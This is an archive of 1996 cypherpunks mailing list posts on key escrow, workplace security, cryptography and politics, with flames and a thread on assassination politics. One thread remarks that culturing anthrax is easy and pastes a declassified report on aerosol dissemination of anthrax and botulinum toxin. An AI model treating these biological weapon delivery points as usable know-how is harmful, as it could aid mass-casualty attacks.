Stephen Hugley, senior vice president and manager of information services at Comerica, calls Mr. De Armas "one of our more literate client/server technicians. "He was instrumental in putting together our Web site, and he is also instrumental in helping other areas of the bank when they have Internet-type questions or issues," Mr. Hugley said. "It's a joy to work with somebody like Frank because he really has a good vision of where the Internet is going and what its value will be." The Internet Banker site (www.ddsi.com/banking/), which now fields more than 20,000 hits a week, has won two awards and garnered several speaking invitations for its creator. Mr. De Armas' wife, Janice, runs a companion Web site called Metro Online, which contains information and listings about Detroit-area happenings. "You meet all kinds of people on the Web - it's amazing," Mr. De Armas said. "Just think of it as a big neighborhood." Among his electronic acquaintances is Tony Plath, director of the University of North Carolina's Center for Banking Studies. Mr. Plath's banking students use the Internet Banker site to collaborate on projects. "The real value in Frank's Web board is that a lot of bankers are point-and-click type Web users - they don't know how to post their own home page in HTML, and they don't have time for it," Mr. Plath said. "This allows you to post messages that people can read and to maintain threads of discussion." Bradley Streeter, a community reinvestment and development specialist with the Kansas City, Mo., outpost of the Office of the Comptroller of the Currency, views the Internet Banker site as a "wonderful research tool." "I was interested in how banks are using the electronic forum to reach low and moderate-income people," he said. "It helped inform me on what other people are thinking about the issue." Bill Burnham, a banking consultant at Booz-Allen & Hamilton, uses the site regularly.
"I check it because they catalogue the top 100 banks on the Internet," he said. "I refer people to it as well." Most of the site's content is free, but Mr. De Armas does charge for his daily newsletter. Colleagues at Comerica receive complimentary subscriptions. And he has been attracting sponsors to his banking site. One advertiser, the principal of a Detroit-based brokerage firm, said the response has exceeded newspaper ads. "I was amazed," said the principal, Michael H. DeLap. "I thought I would put something out there in cyberspace and never hear anything about it again." Mr. De Armas is not the first person whose professional interests led him to develop his own cottage industry. Comic strip fans can look to Scott Adams, the creator of "Dilbert," as someone who created an unlikely career out of a straitlaced corporate job - at Pacific Bell. Mr. De Armas said he is content to stay in banking and enjoy the kudos on his Web site. "They love it here at Comerica," he said. "My management is really happy. It showed a little initiative." 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 01:29:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 16:29:22 +0800 Subject: Diffie Hellman - logs in Galois fields In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk> Message-ID: <7y5euD2w165w@bwalk.dm.com> >From paul at fatmans.demon.co.uk Tue Sep 17 16:14:54 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Tue, 17 Sep 96 16:29:31 EDT for dlv Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA19740 for dlv at bwalk.dm.com; Tue, 17 Sep 96 16:14:54 -0400 Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ay20804; 17 Sep 96 20:55 BST Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23058; 17 Sep 96 20:33 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842988795 ; Tue, 17 Sep 96 19:33:15 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Tue, 17 Sep 1996 19:33:09 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Diffie Hellman - logs in Galois fields Cc: cypherpunks at toad.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <842988785.23058.0 at fatmans.demon.co.uk> > I think polluting this mailing list with trivial questions such as this is > just as bad as polluting it with personal attacks. Read the FAQs. Get a fucking life, seeing as you haven`t yet posted anything relating remotely to the technical aspects of cryptography to this list I think you need to take a long hard look at what your saying loser.... 
Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From shamrock at netcom.com Wed Sep 18 01:32:44 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 16:32:44 +0800 Subject: PGP in the workplace In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com> Message-ID: On Tue, 17 Sep 1996, Rick Osborne wrote: [clueless sysadmin story elided] > Now, seeing as I'm fairly new to the Corporate world, but is this something > common? I know when I was at college, poking around was expected and > encouraged, as it helped find and plug holes in the system. But this is > almost like some kind of protection racket here! This never happend in any company I worked for. Don't think I'd last in such an environment. Neither, one should think, will a company where half the people have root. Three man operations excepted.
Just my $0.02, --Lucky From zachb at netcom.com Wed Sep 18 02:08:26 1996 From: zachb at netcom.com (Z.B.) Date: Wed, 18 Sep 1996 17:08:26 +0800 Subject: WARNING: Major Net-Abuse Message-ID: I don't know the full details about this, so I'll try to give as good an explanation as I can. Since sometime yesterday, someone has been posting huge binaries all over Usenet, usually to at least 20 groups at a time. The files are usually several thousand parts big at the least, and are posted to either groups in which people are likely to respond with emailbombs, or test groups that send you a reply if the message appears on them. What some $#&!@-heads are doing is changing the Reply-To headers to the addresses of people who they dislike or want to harass. See where I'm going now? 10000 posts to a test group with your address on it = 10000 emails in your inbox. I posted this because there are some people on both of these lists who might be the target of one of these spams, and you might want to get your killfiles ready, just in case. Thanks for your time, and sorry if I annoyed anyone with the off-topic post. --- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From ericm at lne.com Wed Sep 18 02:09:38 1996 From: ericm at lne.com (Eric Murray) Date: Wed, 18 Sep 1996 17:09:38 +0800 Subject: PGP in the workplace In-Reply-To: <3.0b16.32.19960917232055.005410c0@gateway.grumman.com> Message-ID: <199609180543.WAA25405@slack.lne.com> Rick Osborne writes: > > Here's one I figure you all would just love: [...] > Upon explaining to them that I was simply trying to make sure of my own > security, I was told that I was to just assume that I was secure, and that > *any* 'poking around' was found to be "highly aggravating" and could only > only "exascerbate the situation further." Quit and go work somewhere that's reasonable. A decent IS department doesn't play games like these; one that's full of morons does. 
Talented people, especially those who know security, are in demand at the moment. So you shouldn't have to put up with petty-tyrant bullshit- go find a company that is staffed by human beings. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From unicorn at schloss.li Wed Sep 18 02:14:28 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 17:14:28 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... In-Reply-To: <9608178430.AA843010044@smtplink.alis.ca> Message-ID: On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: > Black Unicorn wrote: > >On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: > >> Black Unicorn > >> >You are saying that everyone on the planet has a right to health > >> > insurance and disability insurance whether they can afford it or not. > >> > This is folly. The result is serious moral hazard problems. > >> > >> Almost, but not quite. I'm saying that within our two countries at least > >> (Canada, U.S.) everyone could have access to medically necessary > >> procedures because the *society as a whole* can afford it. > > > >The decisions about what is or is not medically necessary must by > >design be made by government in a socialized medicine regime. > > People do make decisions that affect other people. If you feel safer in the good > hands of Allstate than at the government trough, good for you. I feel safer in the hands of the market where Allstate is but one insurance carrier. > Personally, I trust in Allah, but I still tie up my camel. > > > This evades an important point as well. Namely, who cares if society > > can afford it? > > Some things are seen as investments in the future of a society. I view both > Education and Health through this lens. I'd like to hear the argument for Health. 
I'd like to hear the argument for Education- particularly one which makes socialized education systems the only, or even a good answer. > >> But there is a balance between accurately pricing the risk and > >> minimizing the cost of the bureacracy that polices this pricing. > > > > Oh, I see. Let's give the program to the government then. Good idea. > > That will reduce the cost of the bureacracy. > > The point is still valid. Are we not trying to minimize this cost? Now explain how government will reduce bureacracy and minimize cost please. Cite, if you will, a few examples. > >> There are also many ways to modify behaviour, not all of them direct. > > > > And all of them buy into the notion that people are not to be made > > personally responsible for their high risk behavior. > > There it is again. Blame the sick for their lack of moral fibre. Blame the rich for their condition. > Not every victim of lung cancer smokes. I'll tell you what. I will give you a dollar for every non-smoking related lung cancer case, if you give me one for every smoking related case. > Besides, people are notoriously poor at > evaluating the probability of unlikely events (see reference below). A > "punishment" that happens 30 years after the "crime" is no deterrent. > Prevention is usually cheaper than treatment. And now please describe how government and socialized medicine are better at preventing lung cancer. > > I prefer market solutions. > > I prefer solutions. Now please explain how government provides a superior solution. > James -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Wed Sep 18 02:23:30 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 17:23:30 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM> Message-ID: On Tue, 17 Sep 1996, Adamsc wrote: > On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: > > >>... 
former CIA director James Woolsey: responded with some seemingly > >> gratuitous anti-Net > >> rhetoric. Terrorists may use biological weapons like anthrax, he said. > >> "Anthrax is colorless, odorless, and has a 90 percent lethality. One > >> gram has 100 million lethal doses." Then Woolsey delivered the zinger: > >> "The knowledge of how to make anthrax is widely available, including > >> on the Internet." > > >Gee, biotech has come a long way. Now I can download the Anthrax DNA > >sequence from the net and insert it in some carrier bacteria and start > >making Anthrax bacteria. Neat! Culturing and growing anthrax is painfully simple. No DNA required. > >BTW - My dictionary says that Anthrax is primarily an animal disease which > >only occasionally infects humans. It sounds like a poor choice for bio-war > >terror. Incorrect. It is highly problematic and very nasty when it is properly delivered. The hardest thing about anthrax is to get an areosol fine enough to present an inhalation risk. (This is why it does not generally cause problems in humans- it's rare for it to get this fine). > Unfortunately, it can be very deadly. The idea here is that it rarely infects > humans - in the normal course of events. If a determined biowarrior is trying > to infect people, all bets are off. Exactly. > > # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp > # cadams at acucobol.com | V.M. (619)515-4894 -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From azur at netcom.com Wed Sep 18 03:06:06 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 18:06:06 +0800 Subject: The GAK Momentum is Building... Message-ID: >On Tue, 17 Sep 1996 21:02:03 -0700, Lucky Green wrote: >>On Tue, 17 Sep 1996, Timothy C. May wrote: >> However, making the government a _required_ part of such plans implies a >> motive that is not at all the same as what companies wish (mostly, disaster >> recovery). > >The required part will come later. 
Meanwhile, many big players in the
>industry are volunteering to include GAK for you.

It seems that in order for this to work Net consumers must be convinced/coerced into accepting the GAK security features. What if, due to a grassroots uprising, Neters refuse to use products which require GAK or Net services which will only operate via GAK? Isn't there a great opportunity being created for S/Wan, Apache and its ilk and third-party (especially off-shore, non-COCOM, produced) security plug-ins?

>
>When I asked the fellow from HP that proposed the CommerceNet position
>paper how the "voluntary key recovery" he was proposing on his slides
>could possibly aid law enforcement against criminals who obviously
>wouldn't "escrow" their keys, he said, and I am not kidding:
>
>"There are many possible interpretations of the words voluntary and
>mandatory." I was the *only* person in a room full of people working in the
>industry that seemed bothered by this.
>
>> Furthermore, the main worry (for me, at least) is that the government hopes
>> to get its Clipper IV scheme accepted (by means of export laws) at some
>> large fraction of important corporate accounts, not the least of which will
>> be Netscape, Microsoft, IBM, Oracle, Qualcomm, and suchlike major players
>> in the "infrastructure" business. Once most of these have "bought off" on
>> GAK, pressure will be intense to universalize the process, to make it a
>> felony _not_ to use a "Key Authority."
>
>That's exactly how it will be.

Enacting laws which make criminals out of otherwise upstanding citizens is the surest path to civil disobedience/unrest, disrespect for duly constituted government and more serious criminal behavior. I guess I and many friends will be on posters in the Post Office.
-- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From shamrock at netcom.com Wed Sep 18 03:33:01 1996 From: shamrock at netcom.com (Lucky Green) Date: Wed, 18 Sep 1996 18:33:01 +0800 Subject: The GAK Momentum is Building... In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Steve Schear wrote: > It seems that in order for this to work Net consumers must be > convinced/coerced into accepting the GAK security features. What if, due > to a grassroots uprising, Neters refuse to use products which require GAK > or Net services which will only operate via GAK? Isn't there an great > opportunity being created for S/Wan, Apache and its ilk and third-party > (especially off-shore, non-COCOM, produced) security plug-ins? Simple. Incentivize sites/server/payment system manufacturers to require certs from their users. This is already underway. See SET. Then make sure that the certs/keys are GAK'ed. Yes, I know there is a difference between certs and keys. Joe User doesn't. Neither does the media. It is a two step process. > Enacting laws which make criminals out otherwise upstanding citizens is the > surest path to civil disobedience/unrest, disrespect for duly constituted > government and more serious criminal behavior. I guess I and many friends > will be on posters in the Post Office. Those of us that won't have "reformed", have been shot, or imprisoned, will indeed be on the posters in the Post Office. And the banners on all major websites. --Lucky From dthorn at gte.net Wed Sep 18 03:55:22 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 18 Sep 1996 18:55:22 +0800 Subject: Wealth Tax vs. 
Capital Gains Tax Reduction In-Reply-To: Message-ID: <323F9328.7317@gte.net> My comment on the below: For an excellent overview of what the *really* big guys with the *really* big jobs (asst. sec. of state, undersec. of treasury, etc.) have in mind, try to get a video of something called the "World Economic Development Council" meeting, hosted by Nicholas Brady, Lawrence Summers et al, somewhere around Nov. 1992, and broadcast on C-Span. Despite the personal appearance of all the heavy hitters, the look of the program is akin to "Alphaville" or some such film. When you watch, you'll think you've entered the Twilight Zone, but the Alphaville look won't be the main reason for that. Allow me to paraphrase just one of the juicy offerings from Mr. Summers: "When we get this thing in place, if any of those blah blah blah countries gives us any shit, we'll jerk the rug out from under them in a heartbeat.", or, in the words of the infamous Joey the Hit Man, "We'll crush 'em like a bug". In any case, this video is the very best example I've seen of the opposing point of view to T.C. May's Crypto Anarchy. Chilling, in a word. > Thomas Dell wrote: > Needless to say, I despise the idea of a "wealth tax," and I can > see various loopholes and workarounds. I'd also expect a lot of > folks to simply move out of the country if this were to happen........ > The Expat Tax Is Law - The Door Is Now Closed! > by > Marc M. Harris > After last year's failed attempt to pass an American > expatriate tax, the U.S. Treasury Department succeeded in > sneaking the provisions into the miscellaneous revenue positions > of the recently passed Health Coverage Availability and > Affordability Act of 1996. Given the failure of their high > profile campaign last year, the Treasury Department switched > strategies this year and undertook one of stealth. 
While the > press was talking about tax-deductible contributions to medical > savings accounts (MSAs), provisions tightening the expatriation > tax rules were implemented. Foreign grantor trust rules were > also tightened under the law........ > "It has come to the attention of Congress that some > very wealthy individuals have been relinquishing their > citizenship to avoid U.S. income, estate and gift tax. The > bill does not want to discourage citizens from exercising > their right to expatriate, but does not want to provide a > tax incentive for such an action..."....... > If these provisions were making you feel a bit suicidal, > please forget it. Uncle Sam is not only going to pursue you to > the grave, but also your executors and heirs........ > About the Author > Marc M. Harris is a certified public accountant and > president of The Harris Organization. He has already developed a > strategy for legally avoiding the expat tax, which he discusses > only in personal appointments. > Copyright 1996 by Marc M. Harris From unicorn at schloss.li Wed Sep 18 04:12:40 1996 From: unicorn at schloss.li (Black Unicorn) Date: Wed, 18 Sep 1996 19:12:40 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: Message-ID: On Tue, 17 Sep 1996, Steve Schear wrote: > >On Mon, 16 Sep 1996, Steve Schear wrote: > > > >> Someone wrote: > > > >> >The problem is that assasination rarely leads to the installation of > >> >a government that is any better. In most cases it gets worse. > > > >[...] > > > >> We've all heard these arguments, but are they true? Who says so, and how > >> can they be certain? Jim's suggestion has never, to my knowledge, been > >> tried on a consistant, large, scale. When all conventional alternatives > >> have been tried and fail, what have we or the starving children got to > >> lose? > > > >I think "Lord of the Flies" answers this question quite well. > > Does it? LOTF was fiction. 
Can you identify a recent instance in which a > non-governmental organization attempted to influence political/military > events via a concerted AP? Try every violent insurgent movement in the modern era. The only difference is the manner of target selection included no money. > >> Is it legal for citizens of the U.S. to engage in contract killing of > >> foreign military, politations, etc? How about U.S. or foreign non-profits? > > > >As to the first, yes. (There are several anti-mercenary statutes on the > >books) As to the second, I don't understand the question. > > > So, you're saying it is legal for citizens? Excuse me? No, I am saying that U.S. citizens will be breaking the law if they move to overthrow foreign governments, even in private action. This is called, among other names, an anti-mercenary statute. > The second question was whether a non-profit org. could raise > tax-deductible funds to conduct such operations. Done every day. As to the legality, it would clearly be criminal conspiracy to raise funds in furtherance of an attempt to violate anti-mercenary statutes. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From ecgwulf at worldnet.att.net Wed Sep 18 04:19:28 1996 From: ecgwulf at worldnet.att.net (Llywarch Hen) Date: Wed, 18 Sep 1996 19:19:28 +0800 Subject: Workers Paradise. /Political rant Message-ID: <2.2.16.19960918053037.26970514@postoffice.worldnet.att.net> "In July, Mr Lee [Kuan Yew, senior minister of Singapore] described an insight that came to him watching a sheepdog show in Australia. You start off with a group of young puppies, and 'weed out those who are not going to be successful . . . You either have those qualities or you don't.' It was, said Mr Lee, 'the simplest of all the lessons in life.' From _The Economist_, September 14th 1996. 
-- Llywarch Hen From dthorn at gte.net Wed Sep 18 04:27:52 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 18 Sep 1996 19:27:52 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: <323FAF89.651F@gte.net> Krenn wrote: > It would be nice to have a list of actual products which are deemed > potential snake-oil. Such a list could be maintained anonymously > through a nym to avoid all the annoying legal problems with commenting > on another's product. Though truth is the best defense against libel > charges, it would be very annoying to be sued or some such by some > hairbrained snake-oil peddler. Think how much more annoying it would be if the shoe were on the other foot. From tcmay at got.net Wed Sep 18 04:29:30 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 19:29:30 +0800 Subject: PGP in the workplace Message-ID: At 3:20 AM 9/18/96, Rick Osborne wrote: >Upon explaining to them that I was simply trying to make sure of my own >security, I was told that I was to just assume that I was secure, and that >*any* 'poking around' was found to be "highly aggravating" and could only >only "exascerbate the situation further." > >Luckily, I had to get to class, so I cut the conversation before it could >get any more out of control. > >Now, seeing as I'm fairly new to the Corporate world, but is this something >common? I know when I was at college, poking around was expected and >encouraged, as it helped find and plug holes in the system. But this is >almost like some kind of protection racket here! Sadly, this is common. Anybody taking undo interest in security "must have something to hide." Be aware that the effects can be a lot worse than just "being noticed," or even of being dismissed. Companies have been known to call in the police. (And since you are posting with a "Grumman" account, this could trigger visits by the DIA and other such agencies.) 
This happened in a well-publicized case up north, and I am convinced (from reading some of the details) that the programmer was not doing anything criminal. Even many who worked with him have expressed the same views, that he was just an unusually curious and attentive security expert. Some of them tell me they--and their employer!--were surprised the case actually went to trial. But the DA decided, for whatever reason, to prosecute on felony charges. I can only speculate about the pressures, the desire for publicity in a trendy new area ("computer crime"), and about the relative importance of this employer to the local economy. So, don't get too curious. Don't change your passwords more than your neighbors do (or at least not more than 2.13 standard deviations more often than is the statistical average of all employee-units within 7 cubicles of you in all directions). And whatever you do, never, never, never point out security flaws. This is a sure sign of your guilt. Or your smarty-pants attitude, which is actually worse. (Never cast perls before swine.) (All of this is explained daily in "Dilbert," of course.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From SpyKing at thecodex.com Wed Sep 18 04:30:20 1996 From: SpyKing at thecodex.com (SpyKing) Date: Wed, 18 Sep 1996 19:30:20 +0800 Subject: Codex Sample Message-ID: <9609180621.AA09327@plato.mne.com> Attached... This communication is copyrighted by the author. 1996, All Rights Reserved. 
Interception, forwarding, posting/re-posting of all /or any part of of this message is a violation of U.S. Copyright laws and may result in civil or criminal action against violators. The Codex Surveillance & Privacy Newsletter - http://www.thecodex.com From osborne at gateway.grumman.com Wed Sep 18 04:48:30 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Wed, 18 Sep 1996 19:48:30 +0800 Subject: Quantum Computers Message-ID: <3.0b16.32.19960918050947.00539aa0@gateway.grumman.com> I rather enjoyed this article, especially the part about: >It gets even wilder, because the quantum mechanical state of the >matter in the machine's memory determines the output, Seth Lloyd >of MIT thinks you could run the machine in reverse and the result >would be a quantum mechanical micromanipulator. This was great! So where do we plug in the nice hot cup of tea? ;^) I'm sorry if I seem to be making light of a very serious topic, but, last time I checked, computers don't have a reverse. Spam me, flame me, whatever, but as far as I know, the universe only goes in one direction. It's just a rehash of the old sci-fi dramas about building a computer that goes on and builds a smarter computer, ad infinitum. That's one of the problems of non-sentient things: they can't grasp anything beyond their scope. But, for argument's sake, let's assume: 1. This quantum computer, which looks startlingly like my HP48, has a slider labeled: FORWARD -- STOP -- REVERSE And the slider actually works. 2. We are working with a finite-state quantum computer (say 32 qbits worth). 3. There is NO error introduced into the system from any source, including itself. Okay, so I turn my little QC48 on, just to set a state, and then slam the slider into REVERSE. AT this point, it fizzles and dies. Why? Because of the same reason you can't just put the DES algorithm 'in reverse': the quantum equivalent of s/p-boxes. What am I talking about? I'm talking about a QUANTUM COMPUTER here. 
Remember its greatest asset? It does every calculation at once. This is exactly why you can't go backwards. You have nowhere to go, because you have EVERYWHERE to go. Because at each 'quantum tick' of the 'quantum clock' EVERY possible operation is going on, each state has the possibility of leading to every other state.

Now, let's throw out assumption #3, and deal with a slightly more realistic version of my QC48, the QC48SX. Because we're dealing with a computer that produces error in its own system, the error is going to be relatively hard to keep track of. Notice that the error-correction schemes listed don't eliminate error, they just help thin it out. So you've got your result to the operation you just performed:

OP1 + OP2 + OPERR = RESULT

The error-correction protocol makes OPERR small, but it doesn't eliminate it. So this is when I throw it into reverse. (Sure, I could have kept track of all my operations up to that point and traced back along them with no problem, but I can only do that until the point at which I turned on my QC48SX, so let's just assume I didn't keep track.)

I've got RESULT now, and with a reasonable degree of accuracy, I can statistically figure out what two states led up to that point, with a margin of error STATERR. This is made even tougher by the fact that there was an error (OPERR) in the system to begin with. Remember now, every state can lead to every other state, but let's assume we've got NSA-level statisticians here, and STATERR is relatively small. You now have STATERR*OPERR working against you. This is where working in a finite-state machine is good, as it keeps these values relatively small. But they are still there. These errors, in combination with the quantum-s/p-box factor, preclude you from going backwards with any degree of reliability.

Like I said, I'm not trying to tear down anyone's hopes and ideas, I just want to introduce a little *reality* into our system.
____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "Yes, evil comes in many forms, whether it be a man-eating cow or Joseph Stalin, but you can't let the package hide the pudding! Evil is just plain bad! You don't cotton to it. You gotta smack it in the nose with the rolled-up newspaper of goodness! Bad dog! Bad dog!" - The Tick From bdurham at metronet.com Wed Sep 18 04:58:15 1996 From: bdurham at metronet.com (Brian Durham) Date: Wed, 18 Sep 1996 19:58:15 +0800 Subject: Redundancy in XOR encryption Message-ID: <323F94D1.EC0@metronet.com> An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 2801 URL: From azur at netcom.com Wed Sep 18 05:07:15 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 20:07:15 +0800 Subject: Fear of Flying -- from HotWired Message-ID: >On Tue, 17 Sep 1996, Adamsc wrote: > >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >> >>... former CIA director James Woolsey: responded with some seemingly >> >> gratuitous anti-Net >> >> rhetoric. Terrorists may use biological weapons like anthrax, he said. >> >> "Anthrax is colorless, odorless, and has a 90 percent lethality. One >> >> gram has 100 million lethal doses." Then Woolsey delivered the zinger: >> >> "The knowledge of how to make anthrax is widely available, including >> >> on the Internet." >> >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >sequence from the net and insert it in some carrier bacteria and start >> >making Anthrax bacteria. Neat! > >Culturing and growing anthrax is painfully simple. No DNA required. > >> >BTW - My dictionary says that Anthrax is primarily an animal disease which >> >only occasionally infects humans. It sounds like a poor choice for bio-war >> >terror. > >Incorrect. It is highly problematic and very nasty when it is properly >delivered. 
The hardest thing about anthrax is to get an areosol fine >enough to present an inhalation risk. (This is why it does not >generally cause problems in humans- it's rare for it to get this fine). > Why not learn from the pros: IRAQI BIOLOGICAL WARFARE [BW) DEVELOPMENTS Filename:0119pgv.00p [ (b)(2) ] [ (b)(2) ] SUBJ: IRAQI BIOLOGICAL WARFARE [BW) DEVELOPMENTS 1. [ (b)(1) sec 1.3(a)(4) ] IRAQ ACQUIRED FORTY HIGH PERFORMANCE AEROSOL GENERATORS IN THE SPRING OF' 1990 OSTENSIBLY FOR SPRAYING CROPS WITH PESTICIDES. THE GENERATORS WERE CUSTOM BUILT TO DELIVER EITHER LIQUID OR DRY MATERIAL EITHER SIGNLY OR SIMULTANEOUSLY. THE GENERATORS CAN DISTRIBUTE FIFTY LITERS PER MINUTE [3-,0O0 LITERS PER HOUR OR APPROXIMATELY 800 GALLONS PER HOUR) THROUGH A CUSTOM DESIGNED NOZZLE[S] WHICH PERMITS THE AEROSOL TO BE ADJUSTED TO TEN DIFFERENT PARTICLE SIZES. THE DISSEMINATION OUTLET CAN BE ROTATED ONE HUNDRED AND EIGHTY DEGREES THEREBY ENABLING DISSEMINATION HORIZONTAL TO GROUND OR WATER SURFACES, OR UPWARDS AT AN ANGLE PERMITTING PREVAILING WINDS TO CARRY THE AEROSOL. THE IRAQI ENTITY WHICH ACQUIRED THE AEROSOL GENERATORS IS NOT KNOWN AT THIS TIME BUT COULD VERY WELL BE CONNECTED TO THE IRAQI BIOLOGICAL [ (b)(2) ] WARFARE BW PROGRAM. 2. THE AEROSOL GENERATORS ARE OF SUCH--SIZE TO FIT ON THE BACK OF A PICKUP TRUCK OR A SMALL ALL-TERRAIN VEHICLE, A SMALL BOAT, OR SMALL AIRCRAFT. THESE UNITS WOULD BE SUITABLE FOR THE DISPERSAL OF BW AGENTS IN EITHER LIQUID OR DRY FORM. THE ABILITY TO DISPENSE SIMULTANEOUSLY TWO BW AGENTS AT THE SAME TIME. SUCH UNITS, HOWEVER, WOULD THEMSELVES BECOME HEAVILY CONTAMINATED DURING USE AND WOULD REQUIRE DECONTAMINATION TO RENDER THEM SAFE. PERSONNEL OPERATING SUCH UNITS WOULD AT A MINIMUM NEED TO WEAR A PROTECTIVE OVERGARMENT A CHEMICAL AND BIOLOGICAL WARFARE MASK, AND UNDERGO THOROUGH DECONTAMINATION AFTER DISPENSING THE AGENT(S) . 
DECONTAMINATION OF THE AEROSOL GENERATORS AND TRANSPORT VEHICLES WOULD LIKELY HAVE TO ACCUR NEAR THE AREA OF OPERATION AT REMOTE LOCATIONS SO AS TO MININIZE INCIDENTAL CONTAMINATION OF IRAQI FORCES. 3. THE IRAQIS HAVE TWO CONFIRMED BW AGENTS--ANTHRAX AND BOTULINUM TOXIN. ANTHRAX CAN BE4 DISSEMINATED BY AEROSOL GENRATORS EITHER AS A FREEZE-DRIED POWDER OR AS A LIQUID SUSPENSION. THEORETICALLY BOTULINIUM TOXIN CAN BE DISPENSED AS EITHER A FREZE-DRIED POWDER, PROBABLY IN COMBINATION WITH A FILLER, OR AS A LIQUID. THE MORE LIKELY OF THE TWO CHOICES FOR BOTULINUM TOXIN IS DISSEMINATION AS A POWDER. POWDERS ARE EASILY MIXED WITH FILLERS, POSE A CONSIDERABLY GREATER THREAT THROUGH INHALATION, AND ARE BETTER ABLE TO WITHSTAND THE SHEAR FORCES EXPERIENCED WHEN DISSEMINATED THROUGH NOZZLES WITH A RELATIVELY SMALL ORIFICE. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From paul at fatmans.demon.co.uk Wed Sep 18 05:12:19 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 20:12:19 +0800 Subject: Redundancy in XOR encryption Message-ID: <842988795.23113.0@fatmans.demon.co.uk> > > > > Compress P to get perfect compression (ie. 0 redundancy) > > Encrypt F (the compressed text) using a repeated key XOR > > > > of course this is all rather theoretical as there is no such thing as > > perfect compression, but I just thought it might be interesting to > > see if this is indeed strong, superficially it appears so to me... 
> > > > Paul:
> I think that if the cryptanalyst knows that F has zero redundancy
> that he can run searches from 0 to n bits for the key and have
> the computer flag solutions that have zero redundancy.

I never thought of that.

> I also think that a perfectly compressed file would have a relative
> entropy value close to one also, hence the computer could flag possibles
> that have both characteristics.

Yeah, these two are reasonably unlikely to occur together (only a reasoned guess, anyone got any comments on this?) so we really have a weakish system.

> Hence, instead of searching for plaintext by counting coincidences,
> we are searching the decrypts for solutions that have zero redundancy
> and a relative entropy value close to one. How many solutions will
> have both these qualities? I don't know. But if the compression method
> is known, brute force will be tried, and only having to try to
> decompress (read) data that has the resultant characteristics
> of compressed information will speed things up by quite a bit.

